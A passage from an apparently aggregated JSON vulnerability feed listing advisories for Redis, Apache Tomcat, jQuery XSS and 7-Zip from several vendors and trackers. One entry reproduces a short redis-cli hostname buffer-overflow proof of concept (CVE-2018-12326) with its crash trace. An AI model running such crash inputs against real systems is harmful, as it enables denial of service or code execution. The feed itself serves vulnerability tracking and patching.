AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known\n\n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566\n#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637\n#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5\n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9\n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291\n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-06-19T11:38:10", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-06-19T00:00:00", "title": "Redis-cli < 5.0 - Buffer Overflow Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-12326"], "modified": "2018-06-19T00:00:00", "id": "1337DAY-ID-30598", "href": "https://0day.today/exploit/description/30598", "sourceData": "# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)\r\n# Exploit Author: Fakhri Zulkifli\r\n# Vendor Homepage: https://redis.io/\r\n# Software Link: https://redis.io/download\r\n# Version: 5.0, 4.0, 3.2\r\n# Fixed on: 5.0, 4.0, 3.2\r\n# CVE : CVE-2018-12326\r\n \r\n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker\r\n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.\r\n \r\n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'`\r\nCould not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known\r\n \r\n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566\r\n#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637\r\n#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5\r\n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9\r\n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291\r\n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)\n\n# 0day.today [2018-06-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30598"}], "amazon": [{"lastseen": "2021-07-25T19:37:34", "description": "**Issue Overview:**\n\nThe host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88. (CVE-2018-8034)\n\nThe URL pattern of \"\" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected. (CVE-2018-1304)\n\nSecurity constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them. (CVE-2018-1305)\n\nThe defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\nWhen using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. (CVE-2020-1938)\n\n \nAs part of our fix for this CVE, we are disabling Tomcat 2019 AJP connector in the default configuration in alignment with the upstream changes. This change will require customers who use the default Tomcat configuration (in which the AJP connector was previously enabled) to explicitly re-enable the connector if they need it. Also take note that a connector configured without an explicit address will only bind to the loopback address.\n\nExamples of output from netstat before and after updating tomcat8 and tomcat7 are below (note that it is the same on AL1 and AL2 with both tomcat7 and tomcat8).\n\nAL2 tomcat8.5: \nbefore: \ntcp6 0 0 :::8009 :::* LISTEN 25772/java \ntcp6 0 0 :::8080 :::* LISTEN 25772/java \ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nAfter: \ntcp6 0 0 :::8080 :::* LISTEN 25772/java \ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nTo re-enable the AJP port in Tomcat, users can follow the steps below: \n1) For AL2 Core (tomcat7): Uncomment the following line in /etc/tomcat/server.xml and restart the service \n&lt;!-- \n&lt;Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\" /&gt; \n\\--&gt; \n2) For AL2 Tomcat8.5 extra: Uncomment the following line in /etc/tomcat/server.xml and restart the service\n\n&lt;!-- \n&lt;Connector protocol=\"AJP/1.3\" \naddress=\"::1\" \nport=\"8009\" \nredirectPort=\"8443\" /&gt; \n\\--&gt;\n\nSee also:\n\nApache Tomcat release notes \n[Tomcat 7](<http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.100>) \n[Tomcat 8](<http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.51>)\n\n \n**Affected Packages:** \n\n\ntomcat\n\n \n**Issue Correction:** \nRun _yum update tomcat_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n \u00a0\u00a0\u00a0 tomcat-7.0.76-10.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 tomcat-admin-webapps-7.0.76-10.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 tomcat-docs-webapp-7.0.76-10.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 tomcat-javadoc-7.0.76-10.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 tomcat-jsvc-7.0.76-10.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 tomcat-jsp-2.2-api-7.0.76-10.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 tomcat-lib-7.0.76-10.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 tomcat-servlet-3.0-api-7.0.76-10.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 tomcat-el-2.2-api-7.0.76-10.amzn2.0.1.noarch \n \u00a0\u00a0\u00a0 tomcat-webapps-7.0.76-10.amzn2.0.1.noarch \n \n src: \n \u00a0\u00a0\u00a0 tomcat-7.0.76-10.amzn2.0.1.src \n \n \n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-03-09T19:23:00", "type": "amazon", "title": "Important: tomcat", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014", "CVE-2018-8034", "CVE-2020-1938"], "modified": "2021-04-28T19:32:00", "id": "ALAS2-2020-1402", "href": "https://alas.aws.amazon.com/AL2/ALAS-2020-1402.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2021-07-28T14:36:29", "description": "\nBestPractical reports:\n\nThe version of jQuery used in RT 4.2 and 4.4 has a\n\t Cross-site Scripting (XSS) vulnerability when using\n\t cross-domain Ajax requests. This vulnerability is assigned\n\t CVE-2015-9251. RT\n\t does not use this jQuery feature so it is not directly\n\t vulnerable. jQuery version 1.12 no longer receives official\n\t updates, however a fix was posted with recommendations for\n\t applications to patch locally, so RT will follow this\n\t recommendation and ship with a patched version.\n\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-03-05T00:00:00", "title": "rt -- XSS via jQuery", "type": "freebsd", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251"], "modified": "2019-03-05T00:00:00", "id": "416CA0F4-3FE0-11E9-BBDD-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/416ca0f4-3fe0-11e9-bbdd-6805ca0b3d42.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "github": [{"lastseen": "2021-07-28T15:02:50", "description": "Affected versions of `jquery` interpret `text/javascript` responses from cross-origin ajax requests, and automatically execute the contents in `jQuery.globalEval`, even when the ajax request doesn't contain the `dataType` option.\n\n\n## Recommendation\n\nUpdate to version 3.0.0 or later.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-01-22T13:32:06", "title": "Cross-Site Scripting (XSS) in jquery", "type": "github", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251"], "modified": "2020-08-31T18:19:32", "id": "GHSA-RMXG-73GG-4P98", "href": "https://github.com/advisories/GHSA-rmxg-73gg-4p98", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-28T15:02:40", "description": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-17T16:32:32", "title": "High severity vulnerability that affects org.apache.tomcat.embed:tomcat-embed-core", "type": "github", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2019-07-03T21:02:04", "id": "GHSA-R4X2-3CQ5-HQVP", "href": "https://github.com/advisories/GHSA-r4x2-3cq5-hqvp", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2021-02-27T19:51:25", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 6.1**\n\n * **ATTENTION:** Exploitable remotely/Low skill level to exploit\n * **Vendor:** AVEVA Software, LLC (AVEVA)\n * **Equipment:** InTouch Access Anywhere\n * **Vulnerability:** Cross-site Scripting\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability may allow attackers to obtain sensitive information and/or execute Javascript or HTML code.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of InTouch Access Anywhere, remote access software, use the vulnerable jQuery library:\n\n * 2017 Update 2 and prior.\n\nVulnerable versions of jQuery are those prior to Version 3.0.0\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\njQuery before Version 3.0.0 is vulnerable to cross-site scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.\n\n[CVE-2015-9251](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9251>) has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Chemical, Critical Manufacturing, Energy, Food and Agriculture, and Water and Wastewater\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** United Kingdom\n\n### 3.4 RESEARCHER\n\nGoogle\u2019s Security Team reported this vulnerability to AVEVA, who then reported it to NCCIC.\n\n## 4\\. MITIGATIONS\n\nAVEVA recommends users install update \u201cInTouch Access Anywhere 2017 Update 2b\u201d or later, which can be downloaded from:\n\n<https://softwaresupportsp.schneider-electric.com/#/producthub/details?id=5061> (login required)\n\nAVEVA has published Security Bulletin LFSEC00000126. It can be found at the following location:\n\n<https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf>\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-212-04>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-07-31T00:00:00", "type": "ics", "title": "AVEVA InTouch Access Anywhere", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9251"], "modified": "2018-07-31T00:00:00", "id": "ICSA-18-212-04", "href": "https://www.us-cert.gov/ics/advisories/ICSA-18-212-04", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "kaspersky": [{"lastseen": "2020-09-02T11:42:44", "description": "### *Detect date*:\n05/15/2018\n\n### *Severity*:\nWarning\n\n### *Description*:\nUnspecified vulnerability was found in Apache Tomcat. Malicious users can exploit this vulnerability to bypass security restrictions.\n\n### *Affected products*:\nApache Tomcat 9.x earlier than 9.0.5 \nApache Tomcat 8.5.x earlier than 8.5.32 \nApache Tomcat 8.0.x earlier than 8.0.53 \nApache Tomcat 7.x earlier than 7.0.89\n\n### *Solution*:\nUpdate to the latest version \n[Download Tomcat 9](<https://tomcat.apache.org/download-90.cgi>) \n[Download Tomcat 7](<http://tomcat.apache.org/download-70.cgi>) \n[Download Tomcat 8](<https://tomcat.apache.org/download-80.cgi>)\n\n### *Original advisories*:\n[Apache Tomcat 8.x Security Vulnerabilities](<http://tomcat.apache.org/security-8.html>) \n[Apache Tomcat 9.x Security Vulnerabilities](<http://tomcat.apache.org/security-9.html>) \n[Apache Tomcat 7.x Security Vulnerabilities](<http://tomcat.apache.org/security-7.html>) \n\n\n### *Impacts*:\nSB \n\n### *Related products*:\n[Apache Tomcat](<https://threats.kaspersky.com/en/product/Apache-Tomcat/>)\n\n### *CVE-IDS*:\n[CVE-2018-8014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8014>)7.5Critical", "edition": 35, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-15T00:00:00", "title": "\r KLA11256SB vulnerability in Apache Tomcat ", "type": "kaspersky", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2020-05-22T00:00:00", "id": "KLA11256", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-02T11:53:28", "description": "### *Detect date*:\n05/02/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nA critical vulnerability was found in 7-Zip. By exploiting this vulnerability malicious users can cause denial or service or execute arbitrary code. This vulnerability can be exploited remotely via a specially crafted RAR archive.\n\n### *Affected products*:\n7-Zip versions earlier than 18.03\n\n### *Solution*:\nUpdate to the latest version \n[7-Zip Download](<https://sourceforge.net/projects/sevenzip/>)\n\n### *Original advisories*:\n[7-Zip Discussion](<https://sourceforge.net/p/sevenzip/discussion/45797/thread/adc65bfa/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[7-Zip](<https://threats.kaspersky.com/en/product/7-Zip/>)\n\n### *CVE-IDS*:\n[CVE-2018-10115](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10115>)6.8High", "edition": 39, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-02T00:00:00", "title": "\r KLA11240Critical vulnerability in 7-Zip ", "type": "kaspersky", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10115"], "modified": "2020-05-22T00:00:00", "id": "KLA11240", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11240", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:34:03", "description": "Arch Linux Security Advisory ASA-201806-6\n=========================================\n\nSeverity: Critical\nDate : 2018-06-09\nCVE-ID : CVE-2018-10115\nPackage : p7zip\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-714\n\nSummary\n=======\n\nThe package p7zip before version 16.02-5 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 16.02-5.\n\n# pacman -Syu \"p7zip>=16.02-5\"\n\nThe problem has been fixed upstream in version 18.05.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nAn uninitialized memory security issue has been found in the RAR\ndecoder component of 7-Zip before 18.05, resulting in arbitrary code\nexecution.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code via a crafted RAR file.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/58907\nhttps://landave.io/2018/05/7-zip-from-uninitialized-memory-to-remote-code-execution/\nhttps://landave.io/files/patch_7zip_CVE-2018-10115.txt\nhttps://security.archlinux.org/CVE-2018-10115", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-09T00:00:00", "type": "archlinux", "title": "[ASA-201806-6] p7zip: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10115"], "modified": "2018-06-09T00:00:00", "id": "ASA-201806-6", "href": "https://security.archlinux.org/ASA-201806-6", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2018-06-23T06:01:17", "bulletinFamily": "unix", "cvelist": ["CVE-2018-11218", "CVE-2018-11219"], "description": "This update for redis to 4.0.10 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-11218: Prevent heap corruption vulnerability in cmsgpack\n (bsc#1097430).\n - CVE-2018-11219: Prevent integer overflow in Lua scripting (bsc#1097768).\n\n For Leap 42.3 and openSUSE SLE 12 backports this is a jump from 4.0.6. For\n additional details please see\n\n - <a rel=\"nofollow\" href=\"https://raw.githubusercontent.com/antirez/redis/4.0.9/00-RELEASENOTES\">https://raw.githubusercontent.com/antirez/redis/4.0.9/00-RELEASENOTES</a>\n - <a rel=\"nofollow\" 